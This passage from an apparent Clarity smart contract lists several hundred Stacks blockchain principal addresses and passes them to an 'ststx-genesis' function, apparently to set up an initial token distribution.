'SPH1MEP4HHQY9RWAKKTW79Y0YFFQDQNY7B9R0F0D
'SP19YH4F897N3Q1TG88XTW7H3JH10Y3SQDTB9T3NY
'SP1PZM3TA0WB3QGGSMNSSB3H46YBJ7914GQ5EP54M
'SP1PEWG8HAYGHFSDPCJ9K8FCG4RGE48JQRJHDMS68
'SP36S3MXFCG60B7EVRCW660331AB038GY2PZXE7M1
'SPRZ7D2XQYVDB3HKPFXC5J2HDRRBYW6RZSYWF0JP
'SP7PB70W5RE64VQEZDW8X904APSAJ0H7XQD7N5DC
'SP5RBV76RSZS54KTM0T3JF573PQNJA5D0NZ39QEQ
'SP2DC1NTQTEXJ66K4FAYQVB4C0AA47HP1HFPVYGE2
'SP2BXXX2YN2BTZZM93SNTYZHFPARMDHXN13QHES6M
'SP1BSQ8FNJFQ2EHG9203VBY7QT3B41G6WD8KCZBCB
'SP3X47GEWY38MT4NB7YDC9J79A808WGGYV1GX3GT8
'SP2GCTRCZT60Q1J2JGRZ1239S3XYRGFNSWCW9811C
'SP32BFE0V5ECSZ0EJ9F4K56FYAYXDT0Q470PANKDW
'SP38K1VTTM8HDC9GMZPQJRPZV9FYGNGKM0GPR3NYC
'SP26ZTHR8TM9SH5GJGS596VC8SG2MSK6QNXAK5BQE
'SP12QH0GWBP5D3EEP9024W68FS2WSWGA493E5XAQC
'SP20JNPQ5GN5SH1Q1AM8PA48B145N0FH8AGS2X822
'SP2KFDE7QKEHNYR797GCTNW94WE1GTZWS3NRZGKJA
'SP2XFHYR318PC8WBJE6VPK8JAQBHC8Y2DZ3F4YK6D
'SP1354WV2CVQJH3A61MGW21K4WHZ6E1FDB8012PEY
'SP2Y1ABA22X3DXH2XQB8Z28X67TK4GFG0TMHNDGS4
'SPV66P459FE5HCKXFDFPAG50J78S87NK12VQRZDB
'SP2YWWZBE9E66S68BR8M3675YEKE8AQZSJ3FN4BXR
'SP3CV4K60GQCEH75QNQDGD40HJW8ESG6SVNZH2DVT
'SP34R2HWGEE4QDMD9PD9BYERZWAMD2B114EKCQEPD
'SP3K75K2VYFWCBRM4B5V14NFX5BPDE3AZ5VSTP953
'SPY4G1T3D6SE3R7W1473X4H3CWTCBGQM1NAPKTP7
'SP1D806M319D4NVR95A3AGG5H8T1SD2TPZKDB3CEM
'SP1E27CFJR81JYPZNC5HWFPZKEK16MJAH7Q7WFKPG
'SP27A81T75R8CRMPTAFQT8G8S98MWJS4A7G4F53VT
'SP3MAC4B7FE6WJHZBQ2TG2WZ7P8CHJGXQ0AZF2A1T
'SP2ZT433Z8XTTH1428F2J76FT1ZBKSXTEC5DM16DD
'SP2JMAD57DYM18Y6DRH3DGQBJJSSEH4XQDAJ6DKWX
'SP38A5NN30RQZHYQTPTBMC1TE52QH1N7P471E6J35
'SPG0HM4T1ZNMPBVFNVH7NQY2P1WQQ71NRTT8JRRM
'SPFCPRZDS9JJV12Q6FZEZDPYMD0QB1Y21CE0E0DC
'SP18ZDF3BE3GB5RV9QMJ8989R2GRXXTTVW7HNNAJC
'SPHZ2EBYFF645YWRJXG7XCK514JQBF95FT2ZXB7D
'SP3HE9JVXVNVVSJEQ4AYQ7QQVENDAM5PCEFGBBNGP
'SP32QPKX01DPXPV43J67D3Q98H7G61WBTHEDAM19P
'SM24AWRWX3EGEYS7ZJR3Q6KC7TR5SDGY5BNYVAN07
'SP1BMCSC3PYZ5EDNCASCF24RDK7SFEPV2D92YVEQJ
'SP11W16XMZPYRWAGDMEGRMP6WTG8QXN4HEH54Y25B
'SPBCMGYYPQ2E7YQ6SKXV1BEDJ1MV217WC6THYAZV
'SP18BD1QRZRCS9B7ECBYKWN4TMXVT4Y3A9ZPN1EGH
'SP31EZJDQFV4D101JK7V5CSQSZXS39BA52725X94D
'SP3Y5WK0G9GMXS4YRNW9SSVEET0WFJM37X2SBEW99
'SPN551WE4H1GFH295VN152QN36WAKQTT6EYXF694
'SP2YKKC6S7586ZD5G8CM2G2QA0WR7BWA71STC6YYS
'SP1FV3SN48RVHHQF7456N62G5NW768B8YM44M3AV1
'SP206SMBVYDGPBE7ASJYVJGKRM5EEXCRJTSD95Q3S
'SP1QKTGN0K9AMR5T8AT3H9G1AHVQES272KEQ8KMDD
'SP2GGKGPADPS0ZCNG03J23GZT3GSYNM7F8ZASBEP
'SP15S703Y9SNF28P5R3WQBGVWV350A3V2G2ANR8GN
'SP3S83X4XRE1RB3E3S09TTKGEMS5JPY7KZGQ6KPYZ
'SP2C3NFAPN5XFFX37A6VHXHAD7JMDRREN7F2JRF99
'SP1CD0N2MVHY2HFGBNGNP2MQ1HM67KFVT5PWNPM68
'SP3M7ZGBZJ88SGJDK6Y04RCAKGSNVXTAXKSNN8NW
'SP20NX9GRCBMF9PCCSJVK26QEWF1PF0DYY40Y64WX
'SPVN04V6E2Y1XFYXW7BTE1NCXF2VS4ZDAYQTWASN
'SPTMGY85425E6NSKTM8YRVZA079TJMFQD50K2GRK
'SP30MHJ1WGE5RD74TCX866M9DJ1KPPJ2JXT470AS2
'SP2PVS4V3A52AACGYE6S74RREDFP2AYTYHCTM0ZWW
'SP2M1192T54NJNVG8XVGPG50DFZR0QGFGSSBSAMKX
'SP2STAH25B5PJGX1MAS0K1R14NAPT3PAG5ETEXKDD
'SP2JT2M8YVZQ7VSJ33NXGX49QEHK8V5G5V2K5C6CD
'SP1762BZFE4W1D8DC78DT1VRN28F7KEWBFF01KHZ
'SP26H5Y1T7T5R0WTYYCSCGG7P159HGRN95TJCPDRB
'SPCRMVQAS9Y8B787BY8J0MXSG720FHPK3E4T71N7
'SP2KTF048QDWVSYKKFS4GQMGESK02HZGV9J814JHF
'SP1XMVCPEA2FH976JF7XK39EVZGNAHMGQ18EJEWAS
'SP16RKTVSMP7748B9378CCHVB9476RS0FWDCS74RD
'SPH2HDZSEJD4EF3HJD12YGF7ZXAA6Z37CJCAY0XT
'SP6HKEGFFNPD7HA7BNFY9P9MDV3EHX2SZ5R99PDE
'SPK9J9HYGDFMZAEP6DEBQ8A9TC9VR26C0NXKEF15
'SP7VH5AZD2S38KTBT30KBEM9KJY4T7YHREYPWJCR
'SP2X1PK22MN65MVFP3GT6PEHBW0F3PPXV608MR9AM
'SP1TT9Z79ZAMZ9Q35P3KTMX9Q1FCZ1JQDM09R7PAA
'SP2DBPHXMX9EP75835W1FTDR9AEE58TJVAD2F75YA
'SP2CSJC8RS3SQQXJ6WZS6W24M6AXG44KJWBEM3HVA
'SP19W0E887G1SMRK49NYQ9D63EB6KCDJ768ZHGFR5
'SP2AVDSC5WE6Y0EYHZNRHFNR4V0HC65KST038XFNW
'SP1QYV5P3MHY78EXDBNPX2BMYE9GE5VH303NWDNJ3
'SP309WTQPCJBGWJEGJKQS8KZ9MSKD4J58GZXFTK9
'SP1A9QQRAD4QEXZEJJYEHRX5W33VNTXEAAPVEAXFN
'SP20X8Y964TN7A9VM3MNPDGQGMD5MCW14X22FFCV5
'SP10XKVWVYTX8YZ1CZ6M68JARAR61K89PD97K8ACZ
'SP1WREWVA3MYSYR7S8P5MJGZXCC0M3ZV3RT1Z0V0T
'SPXCE9ZBM54F140CTDSWXY60ZESKSY1W5HR4NH69
'SP13QBHKKPQX7ZHQCX21VYG5H9VG1ZMB6E667C5D1
'SPXNDNHEEJZY2V73ABS6WW6Y4G6GPQQE8E6J9KN6
'SP3CSYYPASA9ACCPFW4XPDV15WHYF7MK9FY118EEJ
'SP2DX5A0H8YVW81F0SH6F82EHV0X9N219CGQPEHCH
'SP3QGV7R7BVS1F3SF2QANDS3H4126WAKF9TG7W4MW
'SP2V8T1VB49XFP2NKE8AVMNPS2CE35WENDXT3JG0M
'SP3AJN0DTE3MNT625K940JZV9BD545TAYEKJEDW46
'SP3DZ5D72X5NNHFP1VCXPFB565DFF4B0Z4MT7FTJM
'SP3ZH3Q76PH6QDJ0ETSSMY09CZFGTV4S9S65KS2G2
'SP128W9G586H9QTZN7N4051M5D83PX719C2BX2ZCA
'SP1MK003YE8VMAJ7VB33ANWTH2R1SJ14685RAFJGS
'SP1MQWG0J41VD7VMBG1JEVYFMSVXW4S08P78DTAX1
'SP1VX5YSA40YHNJM0TPY9SZ23E8NMQH1Q1V2YNSHE
'SP1XKZ69BYC9VNHVQ7PY40Q21WBW7J3SR1GKEK02A
'SP2MV2XM2Y37H0FJBZKGFJS2BSENBWHB5R80WGBJS
'SP38S1NEQJJ6FHJSH21D3EQHXCZY79FZ41HNKWYAD
'SPCDRXRA1JZBHPG0Z4Q6STHHSHRHC263DFRZGG2A
'SP2H4RFCA4RX92B87P2VRZZTZQ1YV7RCQ4WKMGK2C
'SP2VMFC25VKMS1S5ETJJPA6TM0B8PA3MMPW2YC82N
'SP3305TVANC7GKF04Q3MYE6HREW3HTC5D8ZRXTKMN
'SPE71RME79PC8DZ3N9W883SSS9JB9RMNAD93VZV0
'SPRTV6MZHTBHAF46T66B8ZFCDBXNW5TDWF9F1B7P
'SP11HT8B6ZVX2MZN4S8PDSE5ZVRT6T6275NTMGBMM
'SP14YHKVXZH51C2R2GWVNFD8KVYZNAE9YXDA2EXYQ
'SP3C2KRXZ4W85CZMKY19PTM7E1XH6EM2DFRHPB6HY
'SP1EV0B4MGAM0BCEXND0ANSVQNEE6087EPPPYP4S5
'SP1HFVTPX4G65C4FCMHKNWFWX99AXNQYQS3NWN3WA
'SP1XCWH6X8M1NXFW5N7CF8B2BZ608RPM7W2582JWJ
'SP2C92VX3DGZNE9K37YY965PQBHWDPFBQT73A4F7K
'SP2HPE0326K25Z1S288M1BPV0H7X5RGCMRKVC9QST
'SP2WRZ480BY3NQ8PTECX68D1XHTVCWE3CB0N5SVXS
'SP1445K8TJ630C73KAP8ZHPCGTH044CJH0C9CC63H
'SP19FHZJSVMAC2RZ9RGK60DZN99BKA529WZS66TX6
'SP1VAQG33NEKDSKTJ9688QS1WQXPJ0MKEDY32EXB3
'SP23N4XH96SBMDJ10WY97JQFYY7YFDCV0NABFQ8E0
'SP3RSHQ1AYEY0W03ET9H2352VY7094G959K0X7WD
'SPFNEY5D880YVQ9S6Z4SA64DPKYBAVHGXJJE681V
'SP1ARWFZ8C8K69A88WK44BSN0D7DRZ4HGNMBYDN8H
'SP1CTKDY5PEWYZB3QSX1FA4QADRT9863M7GQS9BNH
'SP33BM66CW1JWRCVCKATCCF0MHC4ZNQM7C1GJP1F8
'SP3H00FJV78HNY6H3ANY9E5JX2BD2ZKWH5CMD2SYN
'SP3QEWSFGW5950NPZ591Q57T0T5BV430969ZB7JJY
'SPR6Z65X2RH3KJBGJSX7V3NG4ZMNF18HBN0HXH6F
'SP136NQTX9E4JTNX4GSXFCBZF8FYATA23RBP7G80T
'SP172ZBP3FBVVNT68D9DZTAJ1DECKFR35JMYWJJVZ
'SP3BGGJPP2T09CQT7S02RM281CFPHY6NVM9XMA6CP
'SP1773PQ4NDJTVJZENGVTQ552A5REMJDXS67024T8
'SP3RQ9HK844TEQQ60CWHHG32SAS49D91XHETD978D
'SPYKWXNP8FQ5YDADJ8B988E7JF5V7ZZ5SGYT0PCT
'SP2C63KYZCQRCWQSWQ4R3CW4SCDJFGHSN0JJZAESN
'SP2G4NV4JJK9HDHGA9JF7VHE65QV5PFW6PWJ31JMN
'SP0A9P200TTA48MK4R9MJPSC09TEAPGHBRZCZA6M
'SP1MEPG51VE6M8EPWZNBQ9WAWD1VPKNBP5WA7TV0H
'SP1XTETDG1RCZS1465FXR4F3BP40GGXRHKKNG2DRP
'SP23Z4Q6JPFDS1MBKG1838Z454HK4S2T900D0KS6Y
'SP27MJ2GHQQRXSGRMAHMQRCA2TW6FNYG1MDXR7048
'SP1V0N6WAM58PMW8PV98AWG2XSA1NRZH85ZG5TJCJ
'SP2RS93R5FT8YW2XGE6S23QNYF10K2943KB3NXE2H
'SP2ZMNE2R5H10YY8JQECZXTBFS4XGNVQ092VYJME1
'SP3FRZD6MDDYPRN8Q2MQ8WE4N7E7ZPZYPGJ9Z1JQC
'SP22NWE61BRMCXNH4H3R4R71EJ08S2GKKY17K7W6T
'SP2JCN8ZQAY1VGT9X3GT1R4W4TP5279HX6W6TXH7Y
'SP3MERGDY60XSC084J4Q14JT0TX7MYH73576REHS3
'SP3YR6SKMHBMPNSBSVPNCG5AQJEFAPMX5XDA9TMRS
'SPCXHKXXM52S28QQ3NBVAT0660DX82MQ2A6JPFSH
'SP1ARM51CMDVNVK8KTK2YH4H92E8JFRCR2TG9S7ZN
'SP2TR6G9EEBAH0PNPGHCG85W7QM051NW87T29KJR5
'SP5W8H2C0CP4HKY4MDN9PWR60M6K5VYPZZ3GHZR7
'SPYDMNPS5V6XM4DBT5871W0TWH8NF2A9CRHZGHW0
'SP2BCFT2MXHKRXA8NPEY93PCP0S0M08PHVKKB2DAZ
'SP27212J3J1ETF9NRM18S93MZMZGYPWTGY68XBHKG
'SP13DK06ZNQA07PJ3E8H2B9VAZ3B86HRVXJN5QTW9
'SP1PQ5YRBTZDPX4Y32Z4P4EGSERJHZ6CN7TRZMAKY
'SP35N3JG3Z0M71AJ1H2799XR47EQF9TM3H468X4GT
'SPNZ698AG11TC3C5CA5EGW6CD1EK4FBRZCD6PESG
'SP1DH1QBCSZ2VV6KEE1PNYH1QP5RCDKY6NQFGD6WM
'SP15WSRK1WRCT1W23XFE7QQ0B1TZHQXN3J450FC47
'SPYNNGVX7FK2WGGXY7HZMDTGVHXZ3ASJ7NZ5V48S
'SP1M6YMXN2765KHVDK5AGT1WG1AY9G7SA4BPGWFNB
'SP14TTJF8VC3TPJ54HW93TPR06X562Y7MFDJHWN96
'SP16YHND2BRTTNXK21RMBNV3ZGEMFQCJJQ095KV63
'SP2PA34FJM8R3X8JMF2EX4JQFS9G1KWGQNHEJZFXK
'SP32XAPNJGQ92JH0M8ZDSSMWDDV5J3N1Y15JTEQW3
'SP3J9PNNZ9XV37F94WNGHYRXY70143HPNQW5TZNQM
'SP36ZRVSX4DZ0TAEYNP2PYXHWP1HRN2FEPN3YZVZ3
'SP2E4MZEQYQNG9NXXV7KBZTHBRRJAN2BXAWBWWE8R
'SP3X7D8WFMBYR9G06SRTCKZ4C8XJ4JZND6A73QV1Z
'SP38DJ8AT6X379PM3H6GGVAS40GDRCPX4TBRKH6TX
'SP3AVAT1666G77BRRH1HA2V7Y29WG4XV07WKY0WNB
'SP3CF419BQYPT53FNT9KFA7JBHKNVSC4S6K8NZVVF
'SP15XJP5MMQMA1FKRT0V0GMJNW53XD30B3A55D432
'SP2B7TPBD256H5VX643860A0VJ74K6E712XBBA5V9
'SP4RAT0GYX6RPCPV43K3DFYM58M6NXWTQ2A667WZ
'SP3BGQFXH8GXP7GYYHAX1XA225ZNB1JATTTPRVA03
'SP14R75PXK1PSPXTRW8EHWYQJPKZ27TEXVQFSFR0X
'SPXHF844SBTPVGMS4QK5DJTJ736H4N4KP9FS276
'SP2NVH8GXP0QC89XNNVGTKB69498RAR25WDHBK0WN
'SPJWPRRRJBBTR5XHQCB7N33AZBH05HF7123VTV1Z
'SP16XRAXF1CTZ1W6FATYXZ1Y3JP3Q0FJ6Y62SJ574
'SP263QTJT8Q9V39ERTYVF6CCZXQC8Z2F2W209Q75E
'SP2GQPRRHBZ4JXNESWZRTK5HGE4V8KFR3AX41ZWKQ
'SP3XJGN8ETET2471CH9XTDFM1RD14KJKN5ANGXCMH
'SP1X03FR2VSP6BNTZM2DAKNRS30XH0848GV2789BH
'SP2YK4NHTA6RA4SBJX5GHZXVV33B68F8VE31BY1AG
'SP1TK5MN7YRRB6NGKRB74YG9QF7GE7XSADPNKR1BT
'SP25MD0G9R5JN7TY370CVADYC54R69M54VQM9G7YM
'SP16767Y1NWC58R14GN9PZM0NRZ1JF4HQ7KAY838C
'SP3VWHJ49KVHNEXRHVPVN00W3D9DF7FDWE4B6NFRG
'SP2N7TJV3579D4S21J34KGY047ZS0PWKFJ2RVEVGR
'SP1BJ4RMTSP204P3DQTHB78W2DV25EWQ4CTWPMD5Y
'SP3ZN9607QWTR8WW0QQB633KR8FKE5CC4421GPK64
'SPYH408BRPPFMFRHZ2TB8ZCWVQ15K9RXG138X9Q0
'SP2TZGV6B3J5S8T8YJYN3D55SZMDTTAN0QH89NJD0
'SP3Z4XXFH7RT69JYKVZWKRZ0TYM8M22ZT1P9HTXX8
'SP3R9ENRW74YJ2T7ZMS2NNK7PDHZ2RG6FTJHGV8GS
'SP1D05W959Z841MWBWQD3BW9ZV1JTFTYW58Y4DTJ2
'SP203KT3RVJ0QA5Y6NFZ6TD885CEZAHWWTWSSFJ86
'SP0FJNWCP979FT7FQ639KN5T2SWZX8F4FDC7F8MP
'SP10QV0M8MVD8CXTTQMWF3WSG0SSEBWAV9H272M7M
'SP3RF96VS7HX8D9NPT82XZBMBBCGFZWX288VGWVHA
'SP27P1JBQSW5H9NEBVYP0YSSHDRRK3JTP18T63WKB
'SP3ERADCWMNDR1GSPAYPPM59TGJT0NMRXPC6MXS6J
'SP3JMCC5WQWGVT7WZQVJNMJDH1VEPBAEDE192Q4D5
'SP1DVJGD3PQ69S5YC7K5RP6BHHDDDKJMWTG1P04ZZ
'SP3NF437QY8ZA0ZR9406RH78TP15JJG5EGESKCQBQ
'SP1Z1A9GK1CQKSKCA9GS746KFYT2R6QTRQV4Y50ZA
'SP5RHVD792XR9S9H0YSZTPFESKVGNA6Z9FTMS2TC
'SP3BKFHPMKPEX0QRT1TW4HKD5CGCKCVKZ836FZWZ1
'SP230JCC53KTH3GTJWFCDGR88QAQG9BVVYYW9KARC
'SP3Z6NEF3FVRRR8PV6E43YF275DKK7A968X8CDVY9
'SP3YBZ4N65NEQSFWBDAPW7CMFB7ADKZB2J5SFYGPD
'SP25TV3J9H6Z0AMGF3VDJPB0NRP12CZY9VCQEVBSN
'SP1FP208WASFNJR26TYKKBT3PPBTXCSXV55AMSPSW
'SP1CHZPRKYEX9CKKAQZPT0WMVHT8R14947W7Y1Q6W
'SPZYARQK04SAFCEW3TAXZVGC22R5SEWG93R38JX8
'SP1CK5V09BR0K594J6ZFFWJTXN57GV7Q9R29B47ZA
'SP16HT27FNRS8NGDE88XVH3JRG9QV7E1D0M132EP6
'SP2YFFBTT8SP4Z4Q8HYHJRWB8M888MMQ67HTJBZFS
'SP2S6DDYAH8G8GYZYR6GDT4S1V8AEE2ABN9ZQMVN6
'SP20SEPXYQRSF6M6P0QX2S9KE0F1CP87YNRGC89PX
'SPR3JMF7FMTNKGG70VB6XJ81GCBAEYR1SNS38YEV
'SPAPHJ1YPE74NB1JGJ5Z3TDDF8SGS5SQQWMCZS6P
'SPE89P2V2731TTDX0XPK3PXP0S067V4ZMH1FQESD
'SPR1AWFKZ1J6Q3GQNY870GQQPXDC4YADHC3NS7N7
'SP2ZK4BG9F2YRQRVW8JAW881CMNVH1PSMZZDSGJAZ
'SP3JM5CAJFSWE7ZE92NJ1V1Q3HFMNMQWM3NABHW6V
'SP262F10X1HMTEGYFJ9N7VAG1VEWZ2Y2MY9B9Y35P
'SP19119Z49PNJW6HTR3CFC3SB4PG57MFMGE1MQX34
'SP26Z56QP73QTSXCWCF7P6M4T59S2PCXYB13TNYEE
'SP35GN1BXT4KVSEW732Z28SXPMV8T69GJPQJHXNP2
'SP3F9BD5V63H02D1DTJCVQ54JVTK9WMPPQV2WKQE2
'SP38JQJ2DD5YX1F6ZPCSBJQTTCGDHV76G9PNKTD7Z
'SPG5GFBVS76BCMDV05XHADN02FHX3JWCTANS37K0
'SP2Z6VMZW1AF35VX4SNQAHXYN1J4B02H10A4TYRQD
'SPTBAXKRKT7EXTZ6QRZFG1145M0BZ0TTX3HJZTFW
'SP14MRYZJJZXWHXCP6ABH1GW7C9RQ9AVHC0Z0FS3K
'SP2MR3XPDRWEW8MZ4CBRGYRKGMRZ39Y7RKPVJDVYP
'SP3Y3V851X7VYAVACE4D3HV516N9TQ4Z0T4AXP1ZE
'SP3MG3Z3B95WWAMMDHG3HASF92BS8VH758BTTGE6C
'SP156FED03MQVEPASGK4GGSGJKWPR0QGXN66E7Z74
'SP23VW09414Y0X9HHT4NF0DX5Z119993JQ0Q6C71H
'SPC8JRYS0VDRHCQZ79QQDQ6H6739A5N8JMVES1S3
'SPDZ1BM1N069T9XGSKC50FB59097RD499J6MTY60
'SPVQBTWBPTYJ6TCEZZYW7H737Q6223WVW8BD5FJ9
'SP3226ZHC3DA5AC5NCZ644H5TEXH54B0FCQDP3DQW
'SP2N2EK3Y5JX9437Z2ZR7X3FPTEECTYWDG4ZZ6TVY
'SP3DGXEPAK3FPXA2T19B85AF9A0JBYMWC0YF1NH41
'SP2S99JHD1C42MQR859K20ZQ8Y20F750A6BTD4CB1
'SP3QQDRWFRSC53KFNQQGZEW0D456C54G180XFF10B
'SP3Q7JJ8GCGJWTYAHE4VAQXAJGZWFPERZGP7BS0AY
'SP37VF4PF3GF00F9A96Z1Q74A7N1J8PGA3T19ME7Y
'SPHJEARQH6VTD38R0FAA0GPJ2ESE7SK7Y8RT4JTJ
'SP31606RMBKNWNYNTN62K5AXBVMQFYZFTDB0YRT7E
'SP1YQ3JXPGBT6TSEWYVAB7PWXNJY9G6YJ3B7DMWFN
'SP19W7P0E0DY0ESP5MMV7S3V6G78374GNEJJS56NN
'SP1279BZRZ7REEW94SZ26JYP21HK5KXDHCKRGHY69
'SP109CE8M9NFC7VS032KMWFK5X9N76HQKM8CMBB2X
'SP9Q8EK567PF03YYA79W8BQVS7N2R4KYYMNBFQDR
'SP3ANMQ34BE5C5E1KB11KCJTCK7FV7P7AE6YF1WQ
'SP1T5E12X2500ZWEVMJQEZSHQG9H1VH9401AV335D
'SP389J1FQ10RNHX6688FXD98HF475HNDFQ472C50F
'SP9H21EFHTVKM8V2W382YCAZ627T6QH0D1VCJRQY
'SPWN3VVJ094C2AFF7QG04QE6SKRSVJ811D1Q10WZ
'SP2NRPAXMS3WT57T9E26TK3D0T012CC8RZYECYYXP
'SP4PDBJGQSPM4WHBTFRCW3XPKCWH6RW2A2FYSYTV
'SP1BT4YQY2PZ3MNM5YJNPDFCTQAVHF0KVEPWWD52Z
'SP27X8GDAHPA9ECB2Y35ZACZY65B4RBAXJPZN2R82
'SP38N0R8Q5YRMBHJCQSHFK06GCDW3JBXT8PCAA6WW
'SP2PG4W40VBXCE7TQ203WDG6AFP0B076CX0TRF669
'SP1KKXW9DQD1H2ABZMB7JJQNNM9WX41JQEG49SDQ3
'SP1PP9TWQ1KM7W1NDG11QETMGTE57C713YEQD0RRY
'SP15GB7FQAWPCJ79R17D2H4XSD77P5VQD77VT5TP1
'SP2KD0GJPQF4SBKG0ENKPNP3MYPPW0P5TQ5K69H4E
'SP16YA5N2VE52JRDYXKFZ2TF7T2CBRB4SH8NYKJX1
'SP1EQ7W6T3K234S1HA96DZB154VM4HCX13KQM5K81
'SP16RE7MTJRBME6X8ND7QAQAJZ9DB3A033Z1XZJRP
'SP3SYDENAQ1VF46R43RV71YMKYCRMZ3QH5TP6HHMG
'SPNAWB2J4SYNWKX8WME3RHXEFHHJTZ3R3JNR6HDH
'SP3TD3DMHE97NXPVMYKNTH17FBGR999NXBQBKKWWF
'SP1QMEG0QJKSPK9P0APEWN7R5NT3GMQ8CXZRBCNFY
'SP7QHVJF0619N7R4QR09QDWPXJP3CFFW0RQBR4K0
'SP3YYPWR1PKH2QHKDC30C28B4X8KM0F75ZS1HW6JH
'SP36G2TZJWD17PGNVTPP0B2K0F107XY50KY1T0TDN
'SP12RH5ZVAXXQ50JBWE6MTYX8QAYHB0121B1VGQWE
'SP11J2E5E9VMBFS3SRKWV6APW2A9ARDHEQXRN7SN
'SP1QKPCDWKEHM2869VT5WGN83SAV4Y5EFYMXJNP60
'SPYRS8PCN1EWZTKT162YB2EBMBEN72GRHNB13NGV
'SPMNTTDYV0Q03Y28PM3KVPPBK83VGZFK18Z7RC2R
'SP312FWPC9Z8GPVGNN31JW5JDGG0G46DBQCXT4ZCB
'SPDQAJ1PTXN13ZWEEHSY3PTDP22RZR2C08B3B4N9
'SP2FGW8E8455NA55FGC42MNA6XDPWJYQFGSXYWV2F
'SPEQ97RW8DMYXC84KZSVZ8A9WNBG1FHWSXTQPVJK
'SP1MF46GM7P5KWB24CGN4GNDNFR89ZK3PMQ33SFS9
'SP2J3GZA217FKC102M0CN3ZV60Q0YG6QC3EQQ6N46
'SP2S9GJ32DBX44CK8HV2P6781EA388PZYFQRSKR5G
'SP2VKYP0BVC89F0XPVRHWANEZPZJ9XM2RXRY25QH4
'SPKKWBSQ5YZZWGJS2W3TRG94S02A69MDAE77G52M
'SPQ6JXTQDS457QQZYV3260QNPQNQ1JF1MS35VWGX
'SP2TPQYEF6JFEEQJBVSXF0WMAGC0Y7JQZTV5FMCNB
'SP2W60PWEGH91WR4DMGA4A9FAH31XET81Q3D6RJYE
'SPJZVA847DH92M8N8G5Y4FTHY31RMKR80K3Z7TD5
'SP3NY8TTYDP1RK5Y1A0HMZ7H58K227GWYG8GNSREA
'SP1MZWJ3WM6N7V6047PY15ZEZ5SZ5919EET1Q5M7S
'SP1QRHCPV0DPXWF3CPYZWVHYKJ8SVRDY4G0JZ57CD
'SP3AK3ESYF203FP5JMYNRBB6PTE9P6ZHJXASXB5ZN
'SP2HJER3ERT1Q3GHT7HAS605Z8F6SGNGKM8XD60ZV
'SP0FKZDZNMCRBN52SJAC13J87VARHVDC1WA13A3A
'SPWGFCGAETDBSRNKBH8TFHWYPZWRZ6R9M9C2E6JT
)))
    (ststx-genesis principals))
)